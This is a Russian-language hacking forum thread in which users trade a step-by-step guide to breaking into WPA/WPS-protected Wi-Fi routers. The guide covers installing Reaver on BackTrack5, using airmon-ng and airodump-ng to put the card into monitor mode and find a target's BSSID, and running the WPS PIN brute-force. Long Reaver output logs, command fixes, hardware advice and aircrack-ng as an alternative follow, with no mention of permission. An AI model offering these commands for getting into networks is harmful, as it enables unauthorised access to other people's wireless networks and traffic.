Взлом WPA с помощью Reaver

Jobosick

VIP member
Messages
366
Reputation
54
Reaction score
95
Points
28
Пишут что возможно взломать WPA/2 с помощью Reaver


Но у меня проблема при взломе. Не фурычит нормально.


[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request



[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2012-02-03 16:23:29 (0 seconds/pin)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: 10 failed connections in a row
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2012-02-03 16:23:42 (0 seconds/pin)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK



Помогите мне.




pc.de/software/wpa-passwort-wlans-3209



Перевод в кратце_


1. Запускаем BackTrack5


ШАГ 1: Установка Reaver на BackTrack5


1. Жмем "Applications" > "Internet" > "Wicd Network Manager"
2. Выбераем сеть и коннектимсy
3. Открываем терминал: "Applications" > "Accessories" > "Terminal"
4. Вбиваем
Code:
apt-get update
потом
5.
Code:
apt-get install reaver



ШАГ 2: Сборка инфы для взлома

1. В терминале вбиваем
Code:
iwconfig
2. По усмотрению вбиваем
Code:
airmon-ng start [U][COLOR="Red"]wlan0[/COLOR][/U]
3. Потом вбиваем
Code:
airodump-ng [COLOR="Red"][U]wlan0[/U][/COLOR]
4. Собираем нужную инфу.


ШАГ 3: Взлом с помощью Reaver


1. В терминал вбиваем
Code:
reaver -i [U][COLOR="Red"]interface [/COLOR][/U]-b [COLOR="Red"][U]bssid [/U][/COLOR]-vv
2. Пример reaver -i mon0 -b 00:00:00:00:00:00 -vv
3. Понеслась пизда по кочкам.

(C) Jobosick
 

GreenLine

Professional
Messages
170
Reputation
18
Reaction score
28
Points
28
Last edited:

johnni_doe

Member
Messages
26
Reputation
0
Reaction score
1
Points
3
Пользуюсь Ривером. Могу сказать что ломает 1 из 20 роутеров.
 

ande

Professional
Messages
106
Reputation
11
Reaction score
16
Points
18
Пишут что возможно взломать WPA/2 с помощью Reaver
Но у меня проблема при взломе. Не фурычит нормально.

ШАГ 2: Сборка инфы для взлома

1. В терминале вбиваем
Code:
iwconfig
2. По усмотрению вбиваем
Code:
airmon-ng start [U][COLOR="Red"]wlan0[/COLOR][/U]
3. Потом вбиваем
Code:
airodump-ng [COLOR="Red"][U]wlan0[/U][/COLOR]
4. Собираем нужную инфу.

(C) Jobosick

Проблема в том что ты не правильно даещь команды)

Попробуй так:

1. ifconfig wlan0 down
2. airmon-ng start wlan0
3. ifconfig wlan0 up

и уже потом

4. airodump-ng mon0 (не wlan0 а mon0, так как после команды №2 твоя картачка включилась в режим мониторинга и получила имя mon0)

PS как то так просто писать не умею мануалы))
 
Last edited:

react86

Member
Messages
5
Reputation
-1
Reaction score
0
Points
1
ривер на бт ставить ненадо в бт5р2 есть все.
во вторых ривер работает только в случае впс на ап
в твоем случае расстояние и в следствии плохой сигнал
от себя посоветую прикупить для таких целей alfa awus036h
(30-50$) правдо часто встречаются подделки :)

если тебе нужен пасс с впа2 то воспользуйся альтернативой риверу aircrack-ng
 
Top